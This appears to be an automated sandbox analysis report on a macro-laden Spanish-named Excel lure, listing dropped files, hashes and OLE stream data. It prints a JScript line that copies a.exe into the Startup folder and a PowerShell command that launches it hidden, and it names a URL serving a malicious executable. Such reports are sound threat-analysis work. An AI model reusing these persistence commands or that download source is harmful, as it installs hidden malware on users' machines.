                                                                                                                                                            SSDEEP:768:gHLIU+PDy4GL3Uuwu8uIufFGPIEgB/rCMApfxMwhOJaTSpjfK75rT2C+BHyjdDC/:icZy4GLR/BaDauDvLW7p
                                                                                                                                                            MD5:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            SHA1:C87EA3136E5941B9EBA79BB4621CAAFA7B65A462
                                                                                                                                                            SHA-256:F0A487567534A44C564D2658C7A525E828B985DE773A4F513B3F0CDF10C09BDC
                                                                                                                                                            SHA-512:DCC278E46E59913777DA5D49636D77BBAE06C7F9DA24C7DED43075A6F57702A2F1EDF8CEF4C1A767F2E6B529707EF0386685E86A44BFC75128946C27DB13C5E3
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                            Reputation:low
                                                                                                                                                            IE Cache URL:https://www.seyranikenger.com.tr/mensajeria_system.exe
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0.................. ... ....@.. .......................`............@.................................e...O.... ..h....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...h.... ......................@..@.reloc.......@......................@..B........................H...........L9..........h...p...........................................~..}.....(.......(.......(.....*.0...........#..........(....r...p(.....s.......{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#........7..#........7..#..........+......,T...#.......@(....Z.[.....(.......{......( ...o!......r'..p..( ...r1..p("...o#.....+..r7..p($...&..8.....{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#.....
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17500
                                                                                                                                                            Entropy (8bit):5.5817288422411035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:0t9/Uyi0wPHwy0ykT++SBKn7ulzXo8E7Y9nSJQpJ1G1FYKy:nIyru4K7ulz487RMYd
                                                                                                                                                            MD5:42C524A4728FADB6FF7C310D6ED82279
                                                                                                                                                            SHA1:A2797DED88353E88933F8E181FB04B779390E761
                                                                                                                                                            SHA-256:87434CBE254F6417927D3EC7438E92416B00EE8F354DC68A43B2705F628FF8BE
                                                                                                                                                            SHA-512:2784D41DEC52C02F13C17E6765E0C741AAE2F204C4E3F0B7036E3E99631EA23075AEB1BC7D20402B011CC251A975839C6899D4BB23B9D98FC3EFF4803D0A35F7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: @...e.....................K...........2.4............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)a.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\44D40000
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):228755
                                                                                                                                                            Entropy (8bit):7.982874164570525
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:ukojHNQB2+Uvs6Tu0EA0le7mfFjnmQW/AVc9PA:uZhkpUv30SWmc2PA
                                                                                                                                                            MD5:78BF0B0397A6E75562C0594BFF70118C
                                                                                                                                                            SHA1:1B7682903B7714C42D24F2CC812EAF435129A682
                                                                                                                                                            SHA-256:0414C25D5C90BA60C5B591B0F8F7D34F0D1B11AEF41DFA8FF1C95BF1C9C75844
                                                                                                                                                            SHA-512:4FEDADFDC9B31DEE8623F6ED3BC78398F30CE05347D830867C0215207C0B39D010491B47EA7065375597F55066A49E7E28A3EF1E585F8C39BA60C84D6707043D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .U.n.0....?.......a........>...[.,...&.?.q.H....%..'.._o{Wm0e.|#..LT.u0...u...,.L.....;..z....~.1W..s#:..E..;.!.....*..._S.".5..>.f.....SM.C,..p.....-o.,.....w...........7.H.ZY.&..e......z'c.....B..}.i......H..e2G.$G........:.PN..0....L.`u..~@.n..S.!..!..i.bf.k.jtrpL..S..t.g`...#L..ChV...W.........v6.5y.\..'t..;..yN..%.0...v....^...t..........o...&.c.....}..&x7K.M.7j....i?..KX..C.....c...}.'%.....,>O...<Q.\JXF.As.[............PK..........!.._U1....c.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\499262.js
                                                                                                                                                            Process:C:\ProgramData\a.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):218
                                                                                                                                                            Entropy (8bit):5.040848080507827
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:qWlGYox7D/eJDcMj2bMJtnxyxPHkuWAX+Ro6p4E1C5rAuf5yaKXFof1aNFQkeyH:qoq7yJDIUtxyXWDKaJI5lR9ZQqsH
                                                                                                                                                            MD5:D811BEEFA0EB4692BE15EC756BBAFE49
                                                                                                                                                            SHA1:E930135BA7274A80F8C54514EF9AF857EF47226D
                                                                                                                                                            SHA-256:75E457E09D751D547B5EE234BE96403FFED9ECE5D07C5C719B8B0B307F489027
                                                                                                                                                            SHA-512:CC134E3E6A5C9F6ED9BD0CD2D54BB37064D7098F63281B0FCEDBC0B7C59D037E7090AA88B46EBB2EB8F34FCAA9282941F9CEF1E48EABEF8C6B40EF7AD7D2D3DD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: var FSO = WScript.CreateObject("Scripting.FileSystemObject"); try { FSO.MoveFile("C:\\PROGRAMDATA\\a.exe", "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\a.exe");} catch(err) {}
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0trfj0zt.2gs.psm1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmghts1r.j24.ps1
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Mon Feb 22 18:34:51 2021, atime=Mon Feb 22 18:34:51 2021, length=8192, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):904
                                                                                                                                                            Entropy (8bit):4.660572663633042
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8XcXUNduCH2BvOn429lte+WrjAZ/DYbDtTSeuSeL44t2Y+xIBjKZm:85qm3tcAZbcDP7aB6m
                                                                                                                                                            MD5:6A09C36C82320F791ECC5CB5ADC94109
                                                                                                                                                            SHA1:7B04B3E55A22C8E57EC7D703C99F50395CA30062
                                                                                                                                                            SHA-256:91DA8A11693569CCC881E89369333E946E8A1703EA61C80C6C438A725CA2DD4D
                                                                                                                                                            SHA-512:DC8660E3B341C81161A32CF94B575F4E62B2D88D0AEA51A72E71D03294C5646227C0CA4DEF7E570E50C3684B78CEB139C26875711031C1463E3995E42C09C79A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: L..................F.............-..PA..Q.......Q.... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..VRL.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N..VRL.....#J.....................f..j.o.n.e.s.....~.1.....VRZ...Desktop.h.......N..VRZ......Y..............>.......^.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\LIQUIDACION INTERBANCARIA 02_22_2021.LNK
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:54 2020, mtime=Mon Feb 22 18:34:51 2021, atime=Mon Feb 22 18:34:51 2021, length=783360, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2370
                                                                                                                                                            Entropy (8bit):4.713596692352419
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:89qmETt7N8wnDxB6p9qmETt7N8wnDxB6:89ZEZVK9ZEZV
                                                                                                                                                            MD5:CD4FED673703D52A93764B0204B5E15D
                                                                                                                                                            SHA1:A406F3644307BFAF03E79481380193D1D44E83C3
                                                                                                                                                            SHA-256:97EAFE69390987506896844E9C3035E6F84A1CD3FE5BBEECAFE95EA43B0DCF31
                                                                                                                                                            SHA-512:4FD4A8470AE10081DD4839A0266DC968384C9723DC7E5F82DA9B8A3D83644068A41C439E415A7D6E75DC2E7C9C94F616F0C977E3FD311B466AA6C3E7B849E3FA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: L..................F.... ....s.T........Q....D..Q................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..VRL.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N..VRL.....#J.....................f..j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N..VRM......Y..............>......h..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....VRU. .LIQUID~1.XLS.........>Q|<VRU......V......................c.L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.......n...............-.......m...........>.S......C:\Users\user\Desktop\LIQUIDACION INTERBANCARIA 02_22_2021.xls..?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):161
                                                                                                                                                            Entropy (8bit):4.645820606938903
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:oyBVomMHvLJ0rmkT46lxaAvLJ0rmkT46lmMHvLJ0rmkT46lv:dj6UTtjaTTtxUTt1
                                                                                                                                                            MD5:618DC56A1C2E874ECEFE016D75912A39
                                                                                                                                                            SHA1:E59AAD8BC8D58CDC964EEA6E53F8984B28CFA4EB
                                                                                                                                                            SHA-256:01F801B1C3886DD726A351A3D1E028F996751D6F45823B4DDD81571F9DD1E6A2
                                                                                                                                                            SHA-512:FFB6D23E8E6E1FFBB9C08EC78B2A7865E787C8CAAC5FB351BD1DF31F3039CE1DA763CB4B04B48972B94A5A7809D90453DE0A4DEA987962F5AEEE48B99FC92841
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: Desktop.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22
                                                                                                                                                            Entropy (8bit):2.9808259362290785
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                            MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                            SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                            SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                            SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                            C:\Users\user\Documents\20210222\PowerShell_transcript.715575.WxOfaCb9.20210222203513.txt
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1159
                                                                                                                                                            Entropy (8bit):5.151442141703947
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:BxSAT7vBZRwZx2DOXdBmmuVMJWDHjeTKKjX4CIym1ZJX0BmmuVMAenxSAZ9:BZ3vjqZoONFuLDqDYB1ZOFuoZZ9
                                                                                                                                                            MD5:E8D42F7E2203EC0D4EC7D77177CB8D26
                                                                                                                                                            SHA1:71E6B5B24C6AFC00E0054065D950917AE525C1B4
                                                                                                                                                            SHA-256:3CE51F8AD8E172D7E19760EC05542DB5F1D4EE0F0088B12015CC29198990A68D
                                                                                                                                                            SHA-512:08553CFEAF5B40267FFDF7A70FEB6FB20FEAC6B4798A846BA9231BCB915B2BFD33D4C0C6013E310DBE3A43F6EDAA82304E5FA60BD6ABA4089F926F839AB4D054
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210222203528..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'..Process ID: 5596..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210222203528..**********************..PS>Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'..**********************..Command start time: 2021022220

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Dexter MORGAN, Last Saved By: HP PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 3 22:00:53 2020, Last Saved Time/Date: Mon Feb 22 09:51:33 2021, Security: 0
                                                                                                                                                            Entropy (8bit):7.938164956946986
                                                                                                                                                            TrID:
                                                                                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                            File name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
                                                                                                                                                            File size:774656
                                                                                                                                                            MD5:8cc0e4d5044939ef3d7a7d8825d8c9c9
                                                                                                                                                            SHA1:61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
                                                                                                                                                            SHA256:35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
                                                                                                                                                            SHA512:f73682a1b16ca4271e711a539a078e266e181ec7bc9927844d285b238e789fe1ca727acce8fc2f6997c0fed163f1777e442fc390529ed96ebdb533adfdea3716
                                                                                                                                                            SSDEEP:12288:27xSO0ZMQQnQ3yUZLUXA2ZGoMxFrYETEwIhMA++KnoGnkp4zL0mJm8gz:27EkznQ3bZIXASFEQwIhMA++LGkp4wmY
                                                                                                                                                            File Content Preview:........................>.......................................................b.......d.......f.......h.......j.......l......................................................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                            Static OLE Info

                                                                                                                                                            General

                                                                                                                                                            Document Type:OLE
                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                            OLE File "LIQUIDACION INTERBANCARIA 02_22_2021.xls"

                                                                                                                                                            Indicators

                                                                                                                                                            Has Summary Info:True
                                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                                            Encrypted Document:False
                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                            Flash Objects Count:
                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                            Summary

                                                                                                                                                            Code Page:1252
                                                                                                                                                            Author:Dexter MORGAN
                                                                                                                                                            Last Saved By:HP PC
                                                                                                                                                            Create Time:2020-12-03 22:00:53
                                                                                                                                                            Last Saved Time:2021-02-22 09:51:33
                                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                                            Security:0

                                                                                                                                                            Document Summary

                                                                                                                                                            Document Code Page:1252
                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                            Company:
                                                                                                                                                            Contains Dirty Links:False
                                                                                                                                                            Shared Document:False
                                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                                            Application Version:1048576

                                                                                                                                                            Streams with VBA

                                                                                                                                                            VBA File Name: Feuil1.cls, Stream Size: 977
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
                                                                                                                                                            VBA File Name:Feuil1.cls
                                                                                                                                                            Stream Size:977
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1a aa 91 12 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                            VBA Code Keywords

                                                                                                                                                            Keyword
                                                                                                                                                            VB_Exposed
                                                                                                                                                            Attribute
                                                                                                                                                            VB_Name
                                                                                                                                                            VB_Creatable
                                                                                                                                                            VB_PredeclaredId
                                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                                            VB_Base
                                                                                                                                                            VB_Customizable
                                                                                                                                                            False
                                                                                                                                                            VB_TemplateDerived
                                                                                                                                                            VBA Code
                                                                                                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 1142
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                                                                                            Stream Size:1142
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 16 01 00 01 f0 00 00 00 0c 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 13 03 00 00 a7 03 00 00 00 00 00 00 01 00 00 00 1a aa 97 8c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                            VBA Code Keywords

                                                                                                                                                            Keyword
                                                                                                                                                            False
                                                                                                                                                            VB_Exposed
                                                                                                                                                            Attribute
                                                                                                                                                            VB_Name
                                                                                                                                                            VB_Creatable
                                                                                                                                                            "ThisWorkbook"
                                                                                                                                                            VB_PredeclaredId
                                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                                            VB_Base
                                                                                                                                                            VB_Customizable
                                                                                                                                                            VB_TemplateDerived
                                                                                                                                                            VBA Code

                                                                                                                                                            Streams

                                                                                                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x1CompObj
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:108
                                                                                                                                                            Entropy:4.18849998853
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:244
                                                                                                                                                            Entropy:2.67634243661
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 216
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:216
                                                                                                                                                            Entropy:3.65061706767
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . H P P C . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . * M . . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a8 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 70 00 00 00 0c 00 00 00 88 00 00 00 0d 00 00 00 94 00 00 00 13 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00
                                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 758471
                                                                                                                                                            General
                                                                                                                                                            Stream Path:Workbook
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                            Stream Size:758471
                                                                                                                                                            Entropy:7.96834669995
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P P C B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . 2 F C . 8 . . . . . . . X
